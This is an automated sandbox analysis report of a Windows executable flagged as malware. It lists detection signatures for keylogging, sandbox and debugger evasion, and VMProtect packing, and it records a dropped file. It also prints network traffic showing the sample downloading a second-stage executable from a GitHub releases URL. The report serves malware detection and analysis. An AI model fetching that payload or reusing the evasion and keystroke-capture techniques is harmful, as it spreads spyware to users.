Windows Analysis Report
SecuriteInfo.com.FileRepMalware.1111.23697.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.1111.23697.exe
Analysis ID: 1467925
MD5: d4d645cb0c89359d63a331158cb81eed
SHA1: d05da1f86a6de7d2fcb6c6e87aa7390ced599b63
SHA256: 5817ef3fabfb94cb2458ef826416d99a14f9633239bd4959b3bf3a6ec4c20731
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to register a low level keyboard hook
Creates HTML files with .exe extension (expired dropper behavior)
Detected VMProtect packer
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Detected potential crypto function
Entry point lies outside standard sections
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Avira: detected
Antivirus detection for URL or domain
Source: https://github.careers Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Virustotal: Detection: 73% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA, 0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0070D95B FindFirstFileA, 0_2_0070D95B

Networking
barindex
Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File created: netcomp.exe.0.dr
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00452C79 InternetReadFileExA,InternetCloseHandle, 0_2_00452C79
Source: global traffic HTTP traffic detected: GET /abuzgreksi/456/releases/download/456/123.exe HTTP/1.1User-Agent: AutoHotkeyHost: github.comCache-Control: no-cache
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.facebook.com/GitHub" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Facebook&quot;,&quot;label&quot;:&quot;text:text:facebook&quot;}"> equals www.facebook.com (Facebook)
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.linkedin.com/company/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Linkedin&quot;,&quot;label&quot;:&quot;text:text:linkedin&quot;}"> equals www.linkedin.com (Linkedin)
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.youtube.com/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to YouTube&quot;,&quot;label&quot;:&quot;text:text:youtube&quot;}"> equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Fri, 05 Jul 2024 01:36:13 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
Source: netcomp.exe.0.dr String found in binary or memory: https://api.github.com/_private/browser/errors
Source: netcomp.exe.0.dr String found in binary or memory: https://api.github.com/_private/browser/stats
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://autohotkey.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://autohotkey.comCould
Source: netcomp.exe.0.dr String found in binary or memory: https://avatars.githubusercontent.com
Source: netcomp.exe.0.dr String found in binary or memory: https://cli.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://collector.github.com/github/collect
Source: netcomp.exe.0.dr String found in binary or memory: https://desktop.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/get-started/exploring-integrations/about-building-integrations
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
Source: netcomp.exe.0.dr String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: netcomp.exe.0.dr String found in binary or memory: https://github.blog
Source: netcomp.exe.0.dr String found in binary or memory: https://github.careers
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, netcomp.exe.0.dr String found in binary or memory: https://github.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/about
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe&quot;
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760146944.0000000001360000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exenetcomp.exe?
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/collections
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/customer-stories
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/edu
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise/advanced-security
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise/startups
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/actions
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/code-review
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/codespaces
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/copilot
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/discussions
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/issues
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/packages
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/security
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/fluidicon.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github/roadmap
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github/site-policy/pull/582
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/mobile
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/notifications/beta/shelf
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/pricing
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/readme
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/s
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/ci-cd
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/devops
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/devsecops
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/financial-services
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/healthcare
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/manufacturing
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/team
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/topics
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/trending
Source: netcomp.exe.0.dr String found in binary or memory: https://github.community
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-4dd22d95
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-fd68b41b03a0.j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/behaviors-ac844bd01e4d.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/environment-a36e9a1c67ad.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-0c7b5281bcc9.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-elements-a7dc71cd6e4e.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/global-526475a50099.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-f6d4ee842c1e.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/notifications-global-ce1721184096.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/primer-61560ce103d3.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/react-lib-a89cbd87a1e0.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/sessions-599dffba3e8f.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/site-3ab44dbdb8a0.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-cdd1e82b3795.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-810e4b1b9abd.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-1c
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-cc7cb714ead5.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-83
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-dc42d191447b.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: netcomp.exe.0.dr String found in binary or memory: https://githubstatus.com
Source: netcomp.exe.0.dr String found in binary or memory: https://partner.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/devops/tools/compare
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/learn/pathways
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/newsletter/
Source: netcomp.exe.0.dr String found in binary or memory: https://services.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://shop.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://skills.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://socialimpact.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://support.github.com?tags=dotcom-404
Source: netcomp.exe.0.dr String found in binary or memory: https://support.github.com?tags=dotcom-footer
Source: netcomp.exe.0.dr String found in binary or memory: https://twitter.com/githubstatus
Source: netcomp.exe.0.dr String found in binary or memory: https://user-images.githubusercontent.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://www.electronjs.org
Source: netcomp.exe.0.dr String found in binary or memory: https://www.githubstatus.com
Source: netcomp.exe.0.dr String found in binary or memory: https://www.linkedin.com/company/github
Source: netcomp.exe.0.dr String found in binary or memory: https://www.tiktok.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://www.twitch.tv/github
Source: netcomp.exe.0.dr String found in binary or memory: https://www.youtube.com/github
Source: netcomp.exe.0.dr String found in binary or memory: https://x.com/github
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004094F0 SetWindowsHookExA 0000000D,Function_00004DC0,?,00000000 0_2_004094F0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004105E0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 0_2_004105E0

System Summary
barindex
Detected VMProtect packer
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: .vmp0 and .vmp1 section names
Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Window found: window name: AutoHotkey Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0040155F 0_2_0040155F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004080E0 0_2_004080E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00492080 0_2_00492080
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004181C0 0_2_004181C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0045C340 0_2_0045C340
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00474300 0_2_00474300
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004083B0 0_2_004083B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004925D1 0_2_004925D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00424610 0_2_00424610
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00446620 0_2_00446620
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004586D0 0_2_004586D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004CC740 0_2_004CC740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004147A0 0_2_004147A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004147B5 0_2_004147B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00486A60 0_2_00486A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0048F063 0_2_0048F063
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0040F65D 0_2_0040F65D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0049371D 0_2_0049371D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0049580E 0_2_0049580E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041FAF0 0_2_0041FAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041BF10 0_2_0041BF10
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00474A60 appears 72 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0042FE80 appears 215 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0048D210 appears 31 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0042FBE0 appears 78 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00487ED1 appears 393 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 004C8508 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0048828D appears 50 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00474AF0 appears 46 times
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe
Uses 32bit PE files
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.spyw.evad.winEXE@2/2@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File created: C:\Users\user\Desktop\netcomp.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Virustotal: Detection: 73%
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: dnsapi.dll Jump to behavior
